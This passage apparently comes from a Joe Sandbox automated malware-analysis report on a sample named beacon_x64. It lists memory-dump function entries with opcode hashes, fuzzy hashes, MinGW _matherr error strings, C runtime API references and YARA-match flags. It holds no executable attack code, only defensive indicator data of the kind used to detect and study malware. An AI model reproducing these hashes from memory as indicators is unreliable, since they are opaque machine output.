            • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
            • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
            • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
            • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
            APIs
            Strings
            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
            • Unknown error, xrefs: 00401D2C
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: fprintf
            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
            • API String ID: 383729395-3474627141
            • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
            • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
            • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
            • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
            APIs
            Strings
            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
            • Argument domain error (DOMAIN), xrefs: 00401CE0
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: fprintf
            • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
            • API String ID: 383729395-2713391170
            • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
            • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
            • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
            • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
            APIs
            Strings
            • Partial loss of significance (PLOSS), xrefs: 00401CF0
            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: fprintf
            • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
            • API String ID: 383729395-4283191376
            • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
            • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
            • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
            • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
            APIs
            Strings
            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
            • Overflow range error (OVERFLOW), xrefs: 00401D00
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: fprintf
            • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
            • API String ID: 383729395-4064033741
            • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
            • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
            • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
            • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
            APIs
            Strings
            • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: fprintf
            • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
            • API String ID: 383729395-2187435201
            • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
            • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
            • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
            • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
            APIs
            Strings
            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
            • Total loss of significance (TLOSS), xrefs: 00401D20
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: fprintf
            • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
            • API String ID: 383729395-4273532761
            • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
            • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
            • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
            • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
            APIs
            Strings
            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
            • Argument singularity (SIGN), xrefs: 00401C78
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: fprintf
            • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
            • API String ID: 383729395-2468659920
            • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
            • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
            • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
            • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
            APIs
            • malloc.LIBCMT ref: 00779D78
              • Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
              • Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
              • Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
              • Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308
            • free.LIBCMT ref: 00779EBF
            • free.LIBCMT ref: 00779F23
            • free.LIBCMT ref: 00779F2F
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: free$_errno$_callnewhmalloc
            • String ID:
            • API String ID: 2761444284-0
            • Opcode ID: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
            • Instruction ID: 569e9ae7afdec48145a5467a94a34f9f42179d840923850d9b9d8b17129ce471
            • Opcode Fuzzy Hash: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
            • Instruction Fuzzy Hash: E951B430318A098BDF58FB28989967D73D1FB98390F10897DE54FC3256EE78D9028782
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: malloc
            • String ID:
            • API String ID: 2803490479-0
            • Opcode ID: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
            • Instruction ID: b7b940b90b4bf01e83db8c7768e1ba168d2c75deaeeac207c612ddd49f477674
            • Opcode Fuzzy Hash: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
            • Instruction Fuzzy Hash: 0941D03061CE498B8B19DF2CD88513AB7E1FB8935071045ADEC8BC3246EE38ED02C681